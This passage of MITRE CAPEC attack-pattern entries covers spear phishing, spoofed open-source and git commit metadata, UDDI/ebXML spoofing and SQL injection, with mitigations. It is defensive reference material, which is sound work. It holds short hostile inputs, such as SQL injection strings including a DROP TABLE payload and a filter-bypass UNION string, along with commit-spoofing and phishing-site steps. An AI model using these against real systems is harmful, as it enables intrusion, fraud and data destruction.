ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	98	Phishing
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	116	Excavation
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	406	Dumpster Diving
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	407	Pretexting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Obtain useful contextual detailed information about the targeted user or organization: An adversary collects useful contextual detailed information about the targeted user or organization in order to craft a more deceptive and enticing message to lure the target into responding.

Techniques
Conduct web searching research of target. See also: CAPEC-118.
Identify trusted associates, colleagues and friends of target. See also: CAPEC-118.
Utilize social engineering attack patterns such as Pretexting. See also: CAPEC-407.
Collect social information via dumpster diving. See also: CAPEC-406.
Collect social information via traditional sources. See also: CAPEC-118.
Collect social information via Non-traditional sources. See also: CAPEC-118.

Experiment

Optional: Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the adversary impersonate the legitimate site more convincingly. The adversary can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.

Techniques
Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L).
Optionally obtain a legitimate SSL certificate for the new domain name.

Optional: Explore legitimate website and create duplicate: An adversary creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.

Techniques
Use spidering software to get copy of web pages on legitimate site.
Manually save copies of required web pages from legitimate site.
Create new web pages that have the legitimate site's look at feel, but contain completely new content.

Optional: Build variants of the website with very specific user information e.g., living area, etc.: Once the adversary has their website which duplicates a legitimate website, they need to build very custom user related information in it. For example, they could create multiple variants of the website which would target different living area users by providing information such as local news, local weather, etc. so that the user believes this is a new feature from the website.

Techniques
Integrate localized information in the web pages created to duplicate the original website. Those localized information could be dynamically generated based on unique key or IP address of the future victim.

Exploit

Convince user to enter sensitive information on adversary's site.: An adversary sends a message (typically an e-mail) to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to adversary's website) and log in. The key is to get the victim to believe that the message is coming from a legitimate entity trusted by the victim or with which the victim or does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.
Techniques
Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
Place phishing link in post to online forum.
Use stolen credentials to log into legitimate site: Once the adversary captures some sensitive information through phishing (login credentials, credit card information, etc.) the adversary can leverage this information. For instance, the adversary can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.
Techniques
Log in to the legitimate site using another user's supplied credentials.

Prerequisites

None. Any user can be targeted by a Spear Phishing attack.

Skills Required

[Level: Medium]

Spear phishing attacks require specific knowledge of the victims being targeted, such as which bank is being used by the victims, or websites they commonly log into (Google, Facebook, etc).

Resources Required

An adversay must have the ability communicate their phishing scheme to the victims (via email, instance message, etc.), as well as a website or other platform for victims to enter personal information into.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Accountability Authentication Authorization Non-Repudiation	Gain Privileges
Integrity	Modify Data

Mitigations

Example Instances

The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity that happened in a different area from where they live (details might be provided by the spear phishers) and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An adversary has just collected the target's online banking information which can now be used by them to log into the target's bank account and transfer money to a bank account of the adversary's choice.

An adversary can leverage a weakness in the SMB protocol by sending the target, an official looking e-mail from their employer's IT Department stating that their system has vulnerable software, which they need to manually patch by accessing an updated version of the software by clicking on a provided link to a network share. Once the link is clicked, the target is directed to an external server controlled by the adversary or to a malicious file on a public access share. The SMB protocol will then attempt to authenticate the target to the adversary controlled server, which allows the adversary to capture the hashed credentials over SMB. These credentials can then be used to execute offline brute force attacks or a "Pass The Hash" attack.

Related Weaknesses

CWE-ID	Weakness Name
451	User Interface (UI) Misrepresentation of Critical Information

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1534	Internal Spearfishing
1566.001	Phishing: Spearfishing Attachment
1566.002	Phishing: Spearfishing Link
1566.003	Phishing: Spearfishing via Service
1598.001	Phishing for Information: Spearfishing Service
1598.002	Phishing for Information: Spearfishing Attachment
1598.003	Phishing for Information: Spearfishing Link

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases, Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Example_Instances, Related_Attack_Patterns, Taxonomy_Mappings
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Execution_Flow, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-691: Spoof Open-Source Software Metadata

Attack Pattern ID: 691

Abstraction: Standard

View customized information:

Description

An adversary spoofs open-source software metadata in an attempt to masquerade malicious software as popular, maintained, and trusted.

Extended Description

Due to open-source software's popularity, it serves as a desirable attack-vector for adversaries since a single malicious component may result in the exploitation of numerous systems/applications. Adversaries may, therefore, spoof the metadata pertaining to the open-source software in order to trick victims into downloading and using their malicious software. Examples of metadata that may be spoofed include:

Owner of the software (e.g., repository or package owner)
Author(s) of repository commits
Frequency of repository commits
Date/Time of repository commits
Package or Repository "stars"

Once the malicious software component has been integrated into an underlying application or executed on a system, the adversary is ultimately able to achieve numerous negative technical impacts within the system/application. This often occurs without any indication of compromise.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	690	Metadata Spoofing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	692	Spoof Version Control System Commit Metadata
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	693	StarJacking
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	630	TypoSquatting
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	616	Establish Rogue Location
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	184	Software Integrity Attack
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

Identification of a popular open-source component whose metadata is to be spoofed.

Skills Required

[Level: Medium]

Ability to spoof a variety of software metadata to convince victims the source is trusted.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Accountability	Hide Activities
Access Control Authorization	Execute Unauthorized Commands Alter Execution Logic Gain Privileges

Mitigations

Before downloading open-source software, perform precursory metadata checks to determine the author(s), frequency of updates, when the software was last updated, and if the software is widely leveraged.

Within package managers, look for conflicting or non-unique repository references to determine if multiple packages share the same repository reference.

Reference vulnerability databases to determine if the software contains known vulnerabilities.

Only download open-source software from reputable hosting sites or package managers.

Only download open-source software that has been adequately signed by the developer(s). For repository commits/tags, look for the "Verified" status and for developers leveraging "Vigilant Mode" (GitHub) or similar modes.

After downloading open-source software, ensure integrity values have not changed.

Before executing or incorporating the software, leverage automated testing techniques (e.g., static and dynamic analysis) to determine if the software behaves maliciously.

Example Instances

An adversary provides a malicious open-source library, claiming to provide extended logging features and functionality, and spoofs the metadata with that of a widely used legitimate library. The adversary then tricks victims into including this library in their underlying application. Once the malicious software is incorporated into the application, the adversary is able to manipulate and exfiltrate log data.

Related Weaknesses

CWE-ID	Weakness Name
494	Download of Code Without Integrity Check

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.001	Supply Chain Compromise: Compromise Software Dependencies and Development Tools
1195.002	Supply Chain Compromise: Compromise Software Supply Chain

Content History

Submissions
Submission Date	Submitter	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)

CAPEC-692: Spoof Version Control System Commit Metadata

Attack Pattern ID: 692

Abstraction: Detailed

View customized information:

Description

Extended Description

Version Control Systems are widely used by developers to host, track, and manage source code files in an easy and synchronous manner. These systems are often leveraged to host open-source software that other developers can incorporate into their own applications or use as standalone applications. To prevent downloading vulnerable and/or malicious code, developers will often check the metadata of VCS repository commits to determine the repository's overall pedigree. This may include a variety of information, such as the following:

Owner of the repository
Author(s) of commits
Frequency of commits
Date/Time of commits
Repository activity graphs

These precursory checks can assist developers in determining whether a trusted individual/organization is providing the source code, how often the code is updated, and the relative popularity of the software. However, an adversary can spoof this metadata to make a repository containing malicious code appear as originating from a trusted source, being frequently maintained, and being commonly used by other developers. Without performing additional security activities, unassuming developers may be duped by this spoofed metadata and include the malicious code within their systems/applications. The adversary is then ultimately able to achieve numerous negative technical impacts, while the victim remains unaware of any malicious activity.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	691	Spoof Open-Source Software Metadata

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions
Supply Chain Risks	Development and Production, Sustainment

Execution Flow

Explore

Identify target: The adversary must first identify a target repository for them to spoof. Typically, this will be a popular and widely used repository, as to increase the amount of victims a successful attack will exploit.

Experiment

Create malicious repository: The adversary must create a malicious repository that imitates the legitimate repository being spoofed. This may include creating a username that closely matches the legitimate repository owner; creating a repository name that closely matches the legitimate repository name; uploading the legitimate source code; and more.

Spoof commit metadata: Once the malicious repository has been created, the adversary must then spoof the commit metadata to make the repository appear to be frequently maintained and originating from trusted sources.

Techniques
Git Commit Timestamps: The adversary generates numerous fake commits while setting the "GIT_AUTHOR_DATE" and "GIT_COMMITTER_DATE" environment variables to a date which is to be spoofed.
Git Commit Contributors: The adversary obtains a legitimate and trusted user's email address and then sets this information via the "git config" command. The adversary can then commit changes leveraging this username.

Exploit

Exploit victims: The adversary infiltrates software and/or system environments with the goal of conducting additional attacks.

Techniques
Active: The adversary attempts to trick victims into downloading the malicious software by means such as phishing and social engineering.
Passive: The adversary waits for victims to download and leverage malicious software.

Prerequisites

Identification of a popular open-source repository whose metadata is to be spoofed.

Skills Required

[Level: Medium]

Ability to spoof a variety of repository metadata to convince victims the source is trusted.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Accountability	Hide Activities
Access Control Authorization	Execute Unauthorized Commands Alter Execution Logic Gain Privileges

Mitigations

Reference vulnerability databases to determine if the software contains known vulnerabilities.

Only download open-source software from reputable hosting sites or package managers.

After downloading open-source software, ensure integrity values have not changed.

Before executing or incorporating the software, leverage automated testing techniques (e.g., static and dynamic analysis) to determine if the software behaves maliciously.

Example Instances

In July 2022, Checkmarx reported that GitHub commit metadata could be spoofed if unsigned commits were leveraged by the repository. Adversaries were able to spoof commit contributors, as well as the date/time of the commit. This resulted in commits appearing to originate from trusted developers and a GitHub activity graph that duped users into believing that the repository had been maintained for a significant period of time. The lack of commit metadata validation ultimately allowed adversaries to propagate malware to unsuspecting victims [REF-719] [REF-720].

Related Weaknesses

CWE-ID	Weakness Name
494	Download of Code Without Integrity Check

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-719] Aviad Gershon. "Unverified Commits: Are You Unknowingly Trusting Attackers’ Code?". Checkmarx. 2022-07-15. <https://checkmarx.com/blog/unverified-commits-are-you-unknowingly-trusting-attackers-code/>. URL validated: 2022-08-12.

[REF-720] Deeba Ahmed. "Hackers can spoof commit metadata to create false GitHub repositories". HackRead. 2022-07-17. <https://www.hackread.com/hackers-spoof-commit-metadata-false-github-repositories/>. URL validated: 2022-08-12.

Content History

Submissions
Submission Date	Submitter	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)

CAPEC-218: Spoofing of UDDI/ebXML Messages

Attack Pattern ID: 218

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The targeted business's UDDI or ebXML information must be served from a location that the attacker can spoof or compromise or the attacker must be able to intercept and modify unsecured UDDI/ebXML messages in transit.

Resources Required

The attacker must be able to force the target user to accept their spoofed UDDI or ebXML message as opposed to the a message associated with a legitimate company. Depending on the follow-on for the attack, the attacker may also need to serve its own web services.

Mitigations

Implementation: Clients should only trust UDDI, ebXML, or similar messages that are verifiably signed by a trusted party.

Related Weaknesses

CWE-ID	Weakness Name
345	Insufficient Verification of Data Authenticity

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns

CAPEC-66: SQL Injection

Attack Pattern ID: 66

Abstraction: Standard

View customized information:

Description

Extended Description

When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to interact directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	248	Command Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	7	Blind SQL Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	108	Command Line Execution through SQL Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	109	Object Relational Mapping Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	110	SQL Injection through SOAP Parameter Tampering
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	470	Expanding Control over the Operating System from the Database

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Survey application: The attacker first takes an inventory of the functionality exposed by the application.
Techniques
Spider web sites for all available links
Sniff network communications with application using a utility such as WireShark.

Experiment

Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to SQL injection, attempt to inject characters that have special meaning in SQL (such as a single quote character, a double quote character, two hyphens, a parenthesis, etc.). The goal is to create a SQL query with an invalid syntax.

Techniques
Use web browser to inject input through text fields or through HTTP GET parameters.
Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
Use network-level packet injection tools such as netcat to inject input
Use modified client (modified by reverse engineering) to inject input.

Experiment with SQL Injection vulnerabilities: After determining that a given input is vulnerable to SQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, or to modify or delete information in the database.

Techniques
Use public resources such as "SQL Injection Cheat Sheet" at http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/, and try different approaches for adding logic to SQL queries.
Add logic to query, and use detailed error messages from the server to debug the query. For example, if adding a single quote to a query causes an error message, try : "' OR 1=1; --", or something else that would syntactically complete a hypothesized query. Iteratively refine the query.
Use "Blind SQL Injection" techniques to extract information about the database schema.
If a denial of service attack is the goal, try stacking queries. This does not work on all platforms (most notably, it does not work on Oracle or MySQL). Examples of inputs to try include: "'; DROP TABLE SYSOBJECTS; --" and "'); DROP TABLE SYSOBJECTS; --". These particular queries will likely not work because the SYSOBJECTS table is generally protected.

Exploit

Exploit SQL Injection vulnerability: After refining and adding various logic to SQL queries, craft and execute the underlying SQL query that will be used to attack the target system. The goal is to reveal, modify, and/or delete database data, using the knowledge obtained in the previous step. This could entail crafting and executing multiple SQL queries if a denial of service attack is the intent.
Techniques
Craft and Execute underlying SQL query

Prerequisites

SQL queries used by the application to store, retrieve or modify data.

User-controllable input that is not properly validated by the application as part of SQL queries.

Skills Required

[Level: Low]

It is fairly simple for someone with basic SQL knowledge to perform SQL injection, in general. In certain instances, however, specific knowledge of the database employed may be required.

Resources Required

None: No specialized resources are required to execute this type of attack.

Indicators

Too many false or invalid queries to the database, especially those caused by malformed input.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Use of parameterized queries or stored procedures - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. Note that SQL Injection is possible even in the presence of stored procedures if the eventual query is constructed dynamically.

Example Instances

With PHP-Nuke versions 7.9 and earlier, an attacker can successfully access and modify data, including sensitive contents such as usernames and password hashes, and compromise the application through SQL Injection. The protection mechanism against SQL Injection employs a denylist approach to input validation. However, because of an improper denylist, it is possible to inject content such as "foo'/**/UNION" or "foo UNION/**/" to bypass validation and glean sensitive information from the database. See also: CVE-2006-5525

Related Weaknesses

CWE-ID	Weakness Name
89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
1286	Improper Validation of Syntactic Correctness of Input

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
19	SQL Injection

Relevant to the OWASP taxonomy mapping

Entry Name
SQL Injection

References

[REF-607] "OWASP Web Security Testing Guide". Testing for SQL Injection. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Weaknesses
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Execution_Flow
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Description
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-110: SQL Injection through SOAP Parameter Tampering

Attack Pattern ID: 110

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	66	SQL Injection
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	279	SOAP Manipulation
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	108	Command Line Execution through SQL Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Detect Incorrect SOAP Parameter Handling: The attacker tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application.
Techniques
The attacker tampers with the SOAP message parameters by injecting some special characters such as single quotes, double quotes, semi columns, etc. The attacker observes system behavior.

Experiment

Probe for SQL Injection vulnerability: The attacker injects SQL syntax into vulnerable SOAP parameters identified during the Explore phase to search for unfiltered execution of the SQL syntax in a query.

Exploit

Inject SQL via SOAP Parameters: The attacker injects SQL via SOAP parameters identified as vulnerable during Explore phase to launch a first or second order SQL injection attack.

Techniques

An attacker performs a SQL injection attack via the usual methods leveraging SOAP parameters as the injection vector. An attacker has to be careful not to break the XML parser at the service provider which may prevent the payload getting through to the SQL query. The attacker may also look at the WSDL for the web service (if available) to better understand what is expected by the service provider.

Prerequisites

SOAP messages are used as a communication mechanism in the system

SOAP parameters are not properly validated at the service provider

The service provider does not properly utilize parameter binding when building SQL queries

Skills Required

[Level: Medium]

If the attacker is able to gain good understanding of the system's database schema

[Level: High]

If the attacker has to perform Blind SQL Injection

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Availability	Unreliable Execution
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Properly validate and sanitize/reject user input at the service provider.

Ensure that prepared statements or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers' supplied data from controlling the structure of the executed query.

At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. When possible, run queries against pre-generated views rather than the tables directly.

Example Instances

An attacker uses a travel booking system that leverages SOAP communication between the client and the travel booking service. An attacker begins to tamper with the outgoing SOAP messages by modifying their parameters to include characters that would break a dynamically constructed SQL query. They notice that the system fails to respond when these malicious inputs are injected in certain parameters transferred in a SOAP message. The attacker crafts a SQL query that modifies their payment amount in the travel system's database and passes it as one of the parameters . A backend batch payment system later fetches the payment amount from the database (the modified payment amount) and sends to the credit card processor, enabling the attacker to purchase the airfare at a lower price. An attacker needs to have some knowledge of the system's database, perhaps by exploiting another weakness that results in information disclosure.

Related Weaknesses

CWE-ID	Weakness Name
89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
20	Improper Input Validation

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns, Skills_Required

CAPEC-489: SSL Flood

Attack Pattern ID: 489

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
